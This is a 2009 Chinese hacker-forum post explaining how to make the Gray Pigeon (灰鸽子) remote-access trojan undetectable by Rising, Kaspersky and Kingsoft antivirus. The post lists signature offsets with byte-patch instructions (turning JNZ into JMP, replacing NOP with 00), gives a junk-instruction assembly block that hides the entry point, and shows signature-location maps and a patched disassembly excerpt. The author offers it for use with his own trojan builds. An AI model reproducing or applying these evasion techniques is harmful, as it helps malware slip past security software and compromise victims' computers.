|
|
楼主 |
发表于 2009-3-13 22:19:03
|
显示全部楼层
|阅读模式
来自 山东省临沂市
好久没来黑狼看看了,这个是从以前做的免杀 基础做的 以下具体介绍下
现在免杀就是一个字了 难了
IEXPLORE.EXE
===============================未生成前 DAT的免杀
[特征] 001C5AF9_000****0001 005C5AF9
===========================
过卡吧 瑞星
[特征] 0009A534_000****0002内存地址:0049B134注:用ASM32 小写换成大写
[特征] 0009A8D6_000****0002内存地址:0049B4D6注:用OD载入后把上面的JNZ 该成JMP (JNZ 在汇编指令中意思是 如果0标志没有置位则跳转,JMP 无条件跳转 意思就是不鸟他了直接条,这样能跳过瑞星 和 卡吧的重要查杀过程。)
[特征] 0009B76A_000****0002内存地址:0049C36A注:和上面一样 OD载入后 把内存地址的JNZ 改成JMP
过金山
[特征] 000****4098_000****0002内存地址:00***74C98注:用ASM32 NOP(90) 改成00,意思是一样的,但能免杀
[特征] 00***09C_000****0002 和以上相近 注:和上面一样 NOP 改成00
============================生成后过金山 服务端 的免杀===========================
[特征] 000B902B_000****0002 10月13日
[特征] 000****4098_000****0002 10月15日
[注意] 0009ABA2_000****0049B7A210月19日 jbe
[特征] 0009ABA3_000****0001
==================================说明=================================
过瑞星 (主 表)过卡吧 (主 表) 过金山(表) 其他请自行测试 本人没装
由于先做了DAT免杀后 杀软不再杀了 但是生成后,金山还要杀 所以特做了生成后的服务端免杀
2008年10月10日晚 10点10分 完成只用于本人发布的DAT文件 其他不一样 配合本人的灰鸽子软件使用
软件名字为 网络疯子反编译专用版
制作人:网络疯子 QQ:345****5185有问题联系我,希望几个相互学习。
===================================================================================
[特征] 00***75D8_000****0200C475D8
=======================================13日 过瑞星==============================
[特征] 0009ABA2_000****0049B7A2je 改成JlE15生成后过瑞星
===========================10月19日======================================
[特征] 00***40A8_000****0001 金山DAT 大小转换
[特征] 000B902B_000****0001 金山文件大小转换
-----------------------------------------------------------花指令---------------
push ebp (新入口)
mov ebp, esp
inc ecx
dec ecx
nop
sub eax, 2
inc eax
inc eax
pop ebp
push ebp
pop ebp
push ebp
jmp short 下一个花指令的开头
add byte ptr ds:[eax],al ↓
add byte ptr ds:[eax],al ↓
add byte ptr ds:[eax],al ↓
add byte ptr ds:[eax],al ↓
push esp ←--------← 就是跳到这里 ↑
pop esp ↑
push 20 ↑
nop ↑
push -14
push -4 ↑
nop
add esp,1 ↑
sub esp,1 ↑
sub eax,2
inc eax ↑
inc eax
mov eax, 下一个花指令的启始地质↓ ↑
jmp eax ↓ ↑
add byte ptr ds:[eax],al ↓
add byte ptr ds:[eax],al ↓ ↑
add byte ptr ds:[eax],al ↓
add byte ptr ds:[eax],al ↓ ↑
push ebp ←←←←←←← 就是跳到这里 ↑
mov ebp,esp
push 0 ↑
pop ebp
push ebp ↑
push -3
push 1 ↑
nop
push 2 ↑
nop
nop ↑
push 这里跳到老入口
retn
==================================================================
文件名:C:\\灰鸽子.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0005F7DF_000****0002
[特征] 0005F875_000****0002
[特征] 0005FBDF_000****0002
[特征] 000****0541_000****0002
[特征] 00***96F_000****0002
[特征] 00***84C49_000****0002
[特征] 00***84DB7_000****0002
[特征] 00***85D6F_000****0002
[特征] 000****8967_000****0002
[特征] 0009B769_000****0002
[特征] 0009BC1D_000****0002
[特征] 000B1803_000****0002
[特征] 000B22BD_000****0002 -
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[----------------------------MMM-------------------]
[----------------------------MMM---M---------------]
[---------M-----------------------------MM---------]
文件名:C:\\灰鸽子.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0005FBE0_000****0002a
[特征] 000****4970_000****0002b
[特征] 00***84DB7_000****0002 -c
[特征] 00***85D6F_000****0002d
[特征] 000****8967_000****0002- e
[特征] 0009BC1D_000****0002- f
[特征] 0009E5BE_000****0002 g
[特征] 000B282E_000****0002h
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[-----------------------------M--------------------]
[----------------------------MMM---M---------------]
[---------M---M--------------------------M---------]
文件名:C:\\灰鸽子.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000A5BAB_000****0002
[特征] 000A694F_000****0002
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[-----------------------MM-------------------------]
LANGWENAINI
wangluofeng
NIAILANGWEN
fengziainia
ZHICHILANGWEN
gandiaosharan
15***40HACKER FENGZIHacker Fengzi
文件名:C:\\wlfz.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0005CAAA_000****0002
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[-------------------------M------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
========================09年3月13日 免杀技巧=====================================
特征码 物理地址/物理长度 如下:
[特征] 0005CDE0_000****0002 [0045D9E0] [修改方式: ORXOR]
[特征] 000A1402_000****0002 [004A2002] [-- -- : XJ--> X +1]
[特征] 000B1802_000****0002 [004B8002] [ -- --: NOP ]
0045D9D390NOP
0045D9D4 $53PUSH EBX
0045D9D5 .56PUSH ESI
0045D9D6 .8BDAMOV EBX,EDX
0045D9D8 .8BF0MOV ESI,EAX
0045D9DA .83C9 FF OR ECX,FFFFFFFF
0045D9DD >33D2XOR EDX,EDX
0045D9DF .8BC6MOV EAX,ESI
=================由于时间关系 就不做其他免杀了 这个过 卡吧 瑞星============
|
|
发表于 2009-3-13 22:51:55
发表于 2009-3-14 00:22:49
